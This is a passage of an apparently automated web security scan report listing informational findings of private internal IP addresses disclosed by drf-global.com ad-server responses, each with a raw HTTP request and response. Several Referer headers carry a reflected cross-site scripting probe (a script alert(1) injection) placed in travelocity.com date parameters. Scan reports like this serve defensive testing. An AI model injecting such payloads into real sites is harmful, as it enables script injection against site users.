AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:49 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 119
Content-Type: application/x-javascript

document.write('<img src=\"http://ag.travelocity.com.edgesuite.net/Sponsor_gifs/tvly_default_1x1.gif\" border=\"0\">');
23.30. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=25ce20be-be4e-490f-bab0-c4f6b2466f8d&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=ddd7b6d--%3E%3Cscript%3Ealert(1)%3C/script%3Ec27dd7fe78e&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0BB8AB8D28C2251561FE46210E602AEC.p0526

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:34 GMT
Server: Apache
SERVICE_HOST: 10.8.5.60
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.31. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=c&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&lob=HOTEL&destination=Boston,%20MA%20Massachusetts&departureDate=20111004&returnDate=20111007&adults=1&glsId=440663 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BD863729C172E3809E90E563D50004A1.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=5BEB08ED86FCB6AA7FF4A8E2E4DEC466.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.32. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=w&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&pti=default&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&widget=H_PopUnder&lob=HT&glsId=440663&departureDate=20111004&returnDate=20111007&adults=1 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=2F9959B50366F4CA721965F7F289D37D.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.33. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=29F46A6CB42B71BC5130159228D86761.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.34. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=w&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=25ce20be-be4e-490f-bab0-c4f6b2466f8d&pti=default&ctx=21a533cd-b167-4a14-8c05-823e0d876de3&widget=H_PopUnder&lob=HT&glsId=440663&departureDate=20111004&returnDate=20111007&adults=1 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=ddd7b6d--%3E%3Cscript%3Ealert(1)%3C/script%3Ec27dd7fe78e&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51B9915519ADC9C56D1F581FCA1C58D4.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=EDC2830BC17186D93ACC0D247FE2EC3C.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.35. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=w&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=3e57cdf2-0e89-4497-b33a-80947b77b928&pti=default&ctx=67e8ee2c-a9fa-4168-ac97-3cb991cc9c66&widget=H_PopUnder&lob=HT&glsId=440663&departureDate=20111004&returnDate=20111007&adults=1 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=9DDFD3A477A8E9BCF232C7332ECB0C76.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.36. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=3e57cdf2-0e89-4497-b33a-80947b77b928&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=9CAEC213CBC2B1BA5C8B7A03299C9C68.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
23.37. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=D9CA04FC00EAC02591A81617E3DE3913.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe1() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
23.38. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=4eb2c783-b726-4b7f-b2eb-92dc1479cddd&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EC49D47AFF473B50301CAE75DBBA82B.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=67E5C0A7BB6DF5EA8DDFBBBABE6A2042.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4480

function Miwe1() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
23.39. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=67e8ee2c-a9fa-4168-ac97-3cb991cc9c66&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=B63997506446CC26C3FC5892AAD19536.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
23.40. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD863729C172E3809E90E563D50004A1.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
23.41. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=67e8ee2c-a9fa-4168-ac97-3cb991cc9c66&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=070143C243016C8EF8F1193AE89C48CB.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4480

function Miwe1() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
23.42. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=4eb2c783-b726-4b7f-b2eb-92dc1479cddd&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
